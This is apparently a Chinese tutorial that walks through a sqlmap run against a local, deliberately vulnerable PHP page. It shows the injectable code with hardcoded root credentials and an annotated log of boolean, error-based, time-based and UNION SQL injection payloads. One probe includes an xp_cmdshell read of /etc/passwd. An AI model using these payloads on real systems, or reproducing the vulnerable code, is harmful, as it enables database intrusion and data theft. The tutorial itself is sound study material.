sqlmap注入过程浅析

元始天尊

sqlmap是python脚本写的自动化sql注入工具，把常用的注入步骤以程序实现，节省了人力成本
下面就以实例来说明：
服务器端php文件：
<html>
<head>
<title>登录验证</title>
<meta http-equiv="content-type"content="text/html;charset=utf-8">
</head>

<body>
<?php
        $conn=@mysql_connect("localhost",'root','li')or die("数据库连接失败！");;
        mysql_select_db("dvwa",$conn) or die("您要选择的数据库不存在");
        echo "connect ok";
        $id=$_GET['id'];
        $sql="select * from users where user_id='$id'";
        $result=mysql_query($sql);
        $row=mysql_fetch_row($result);
       
    echo '<font face="verdana">';
    echo '<table border="1" cellpadding="1" cellspacing="2">';

    // 显示字段名称
    echo "</b><tr></b>";
    for ($i=0; $i<mysql_num_fields($result); $i++)
    {
      echo '<td bgcolor="#FF0F00"><b>'.
      mysql_field_name($result, $i);
      echo "</b></td></b>";
    }
    echo "</tr></b>";
    // 定位到第一条记录
    mysql_data_seek($result, 0);
    // 循环取出记录
    while ($row=mysql_fetch_row($result))
    {
      echo "<tr></b>";
      for ($i=0; $i<mysql_num_fields($result); $i++ )
      {
        echo '<td bgcolor="#00FF00">';
        echo $row[$i];
        echo '</td>';
      }
      echo "</tr></b>";
    }
       
        mysql_free_result($result);
        mysql_close($conn);  
?>
</body>
</html>

使用sqlmap
python sqlmap.py -v3 -u http://127.0.0.1/test/validate.php?id=1 --dbs --tables  得到日志解析如下：
初始化(解析域名、确定编码)
[17:28:39] [DEBUG] cleaning up configuration parameters
[17:28:40] [DEBUG] setting the HTTP timeout
[17:28:40] [DEBUG] creating HTTP requests opener object
[17:28:40] [DEBUG] resolving hostname '127.0.0.1'
[17:28:40] [INFO] testing connection to the target URL
[17:28:41] [DEBUG] declared web page charset 'utf-8'
环境检测 防护系统
[17:28:41] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:28:41] [PAYLOAD] ahzV=9142 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
确定可注入性及注入类型(布尔类型盲注)
[17:28:42] [INFO] testing if the target URL is stable
[17:28:43] [INFO] target URL is stable
[17:28:43] [INFO] testing if GET parameter 'id' is dynamic
[17:28:43] [PAYLOAD] 8267
[17:28:44] [INFO] confirming that GET parameter 'id' is dynamic
[17:28:44] [PAYLOAD] 5749
[17:28:45] [WARNING] GET parameter 'id' does not appear dynamic
[17:28:45] [PAYLOAD] 1"..)".",''
[17:28:46] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[17:28:46] [PAYLOAD] 1'YuAvwN<'">HeGQes
[17:28:47] [INFO] testing for SQL injection on GET parameter 'id'
[17:28:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:28:47] [PAYLOAD] 1) AND 8987=4935 AND (3536=3536
[17:28:48] [PAYLOAD] 1) AND 3701=3701 AND (4550=4550
[17:28:49] [PAYLOAD] 1 AND 9686=8234
[17:28:50] [PAYLOAD] 1 AND 3701=3701
[17:28:51] [PAYLOAD] 1 AND 8253=7350-- EnRF
[17:28:52] [PAYLOAD] 1 AND 3701=3701-- FLRJ
[17:28:53] [PAYLOAD] 1') AND 7509=1564 AND ('Jebu'='Jebu
[17:28:54] [PAYLOAD] 1') AND 3701=3701 AND ('geaK'='geaK
[17:28:55] [PAYLOAD] 1' AND 8063=2482 AND 'XbEF'='XbEF
[17:28:56] [PAYLOAD] 1' AND 3701=3701 AND 'RMkX'='RMkX
[17:28:57] [PAYLOAD] 1' AND 5856=1503 AND 'RDlY'='RDlY
[17:28:58] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
根据特征确定目标系统SQL类型及版本(MySQL >= 5.0.12 匹配率0.6)
[17:28:58] [PAYLOAD] 1' AND (SELECT CHR(114)&CHR(100)&CHR(107)&CHR(97) FROM MSysAccessObjects)=CHR(114)&CHR(100)&CHR(107)&CHR(97) AND 'DbiY'='DbiY
[17:28:59] [PAYLOAD] 1' AND (SELECT CHR(74)||CHR(118)||CHR(111)||CHR(107) FROM SYSIBM.SYSDUMMY1)=CHR(74)||CHR(118)||CHR(111)||CHR(107) AND 'cSsG'='cSsG
[17:29:00] [PAYLOAD] 1' AND (SELECT 'mfPA' FROM RDB$DATABASE)='mfPA' AND 'aTlO'='aTlO
[17:29:01] [PAYLOAD] 1' AND (SELECT CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) AND 'Jlkw'='Jlkw
[17:29:02] [PAYLOAD] 1' AND (SELECT 'kWiI' FROM VERSIONS)='kWiI' AND 'ZErM'='ZErM
[17:29:03] [PAYLOAD] 1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66) AND 'TwOu'='TwOu
[17:29:04] [PAYLOAD] 1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(110)+CHAR(90)+CHAR(82)+CHAR(106) AND 'uRvF'='uRvF
[17:29:05] [PAYLOAD] 1' AND (SELECT 0x70676341)=0x70676341 AND 'Rzan'='Rzan
[17:29:06] [PAYLOAD] 1' AND (SELECT 0x70676341)=0x70707a4a AND 'kWRF'='kWRF
[17:29:07] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
[18:51:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:51:13] [PAYLOAD] 1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(5899=5899,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'RXbN'='RXbN
[18:51:14] [CRITICAL] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
[18:51:14] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[18:51:14] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[18:51:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[18:51:15] [PAYLOAD] 1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(4950=4950,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'OBtX'='OBtX
[18:51:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:51:16] [PAYLOAD] 1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(7284=7284,1))),0x71766a7671,0x78))x)) AND 'XMFW'='XMFW
[18:51:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[18:51:18] [PAYLOAD] 1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(6492=6492,1))),0x71766a7671,0x78))x)) AND 'XnKl'='XnKl
[18:51:19] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:51:19] [PAYLOAD] 1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(1401=1401,1))),0x71766a7671)) USING utf8))) AND 'rPMT'='rPMT
[18:51:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[18:51:20] [PAYLOAD] 1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(6928=6928,1))),0x71766a7671)) USING utf8))) AND 'dDAJ'='dDAJ
[18:51:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:21] [PAYLOAD] 1' AND (SELECT 2362 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2362=2362,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WpJo'='WpJo
[18:51:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:22] [PAYLOAD] 1' OR (SELECT 2642 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2642=2642,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DGTi'='DGTi
[18:51:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:23] [PAYLOAD] 1' AND EXTRACTVALUE(2314,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(2314=2314,1))),0x71766a7671)) AND 'MlLO'='MlLO
[18:51:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:24] [PAYLOAD] 1' OR EXTRACTVALUE(3279,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(3279=3279,1))),0x71766a7671)) AND 'rGGW'='rGGW
[18:51:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:51:25] [PAYLOAD] 1' AND UPDATEXML(3523,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3523=3523,1))),0x71766a7671),5575) AND 'hWrX'='hWrX
[18:51:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:51:26] [PAYLOAD] 1' OR UPDATEXML(3425,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3425=3425,1))),0x71766a7671),7820) AND 'WRvI'='WRvI
[18:51:27] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:27] [PAYLOAD] 1' AND ROW(5681,3126)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5681=5681,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 8419 UNION SELECT 2289 UNION SELECT 6743 UNION SELECT 1845)a GROUP BY x) AND 'ARNc'='ARNc
[18:51:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
[18:51:28] [PAYLOAD] 1' OR ROW(8270,8355)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8270=8270,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 9652 UNION SELECT 4070 UNION SELECT 3526 UNION SELECT 2818)a GROUP BY x) AND 'DOpg'='DOpg
[18:51:29] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:51:29] [PAYLOAD] -2827
[18:51:30] [PAYLOAD] -2163' OR 1 GROUP BY CONCAT(0x71766a7071,(SELECT (CASE WHEN (3728=3728) THEN 1 ELSE 0 END)),0x71766a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
[18:51:31] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:51:31] [PAYLOAD] 1' PROCEDURE ANALYSE(EXTRACTVALUE(9234,CONCAT(0x5c,0x71766a7071,(SELECT (CASE WHEN (9234=9234) THEN 1 ELSE 0 END)),0x71766a7671)),1) AND 'tDdN'='tDdN
[18:51:32] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:51:32] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:51:32] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:51:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:51:32] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:51:32] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:51:32] [INFO] testing 'MySQL inline queries'
[18:51:32] [PAYLOAD] (SELECT CONCAT(0x71766a7071,(SELECT (ELT(7909=7909,1))),0x71766a7671))
[18:51:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[18:51:33] [PAYLOAD] 1';SELECT SLEEP(5)#
[18:51:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:51:34] [PAYLOAD] 1';SELECT SLEEP(5) AND 'psZF'='psZF
[18:51:35] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:51:35] [PAYLOAD] 1';SELECT BENCHMARK(5000000,MD5(0x6477584b))#
[18:51:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:51:36] [PAYLOAD] 1';SELECT BENCHMARK(5000000,MD5(0x446a4f65)) AND 'AIFn'='AIFn
[18:51:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[18:51:37] [PAYLOAD] 1' AND SLEEP(5) AND 'Ngyy'='Ngyy
[18:51:43] [PAYLOAD] 1' AND SLEEP(5) AND 'Ngyy'='Ngyy
[18:51:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[18:51:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:51:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:51:49] [PAYLOAD] 1' ORDER BY 1-- zxuS
[18:51:50] [PAYLOAD] 1' ORDER BY 3603-- ZDKi
[18:51:51] [DEBUG] setting match ratio for current parameter to 0.600
确定表列数        (2分order by)
[18:51:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:51:51] [PAYLOAD] 1' ORDER BY 10-- hKIf
[18:51:52] [PAYLOAD] 1' ORDER BY 6-- MBub
[18:51:53] [PAYLOAD] 1' ORDER BY 8-- mdEk
[18:51:54] [PAYLOAD] 1' ORDER BY 9-- EQQE
[18:51:55] [INFO] target URL appears to have 8 columns in query
测试id union查询
[18:51:55] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
[18:51:56] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x456e4b6372506562775171447847415a667866754d4878504c55524a645257624667685377784748,0x71766a7671),NULL,NULL,NULL,NULL-- kwXd
[18:51:57] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL FROM (SELECT 0 AS KdfH UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS lWUm-- HUty
[18:51:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
判断参数长度限制
[18:51:59] [DEBUG] checking for parameter length constrainting mechanisms
[18:51:59] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,(CASE WHEN (3602=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3602) THEN 1 ELSE 0 END),0x71766a7671),NULL,NULL,NULL,NULL-- jEVX
[18:52:00] [DEBUG] performed 1 queries in 1.45 seconds
[18:52:00] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3701=3701 AND 'RMkX'='RMkX
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Ngyy'='Ngyy
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
---
[19:21:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[19:21:04] [INFO] fetching database names
获取表名(information_schema.schemata元数据查表)
[19:21:04] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA—qmix
qvjpqinformation_schemaqvjvq     
qvjpqchallengesqvjvq     
qvjpqdvwaqvjvq     
qvjpqmysqlqvjvq     
qvjpqperformance_schemaqvjvq     
qvjpqsecurityqvjvq     
qvjpqtestqvjvq
[19:21:04] [CRITICAL] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
[19:21:04] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[19:21:04] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[19:21:05] [DEBUG] performed 1 queries in 1.12 seconds
available databases [7]:

challenges

dvwa

information_schema

mysql

performance_schema

security

test
获取列名(information_schema.tables元数据查列)
qvjpqdvwavmbhdeguestbookqvjvq                               
qvjpqdvwavmbhdeusersqvjvq
[19:21:05] [INFO] fetching tables for databases: 'challenges, dvwa, information_schema, mysql, performance_schema, security, test'
[19:21:05] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(table_schema AS CHAR),0x20),0x766d62686465,IFNULL(CAST(table_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6368616c6c656e676573,0x64767761,0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c,0x706572666f726d616e63655f736368656d61,0x7365637572697479,0x74657374)-- eEZq
[19:21:06] [DEBUG] performed 1 queries in 1.11 seconds
Database: performance_schema
Database: dvwa
[2 tables]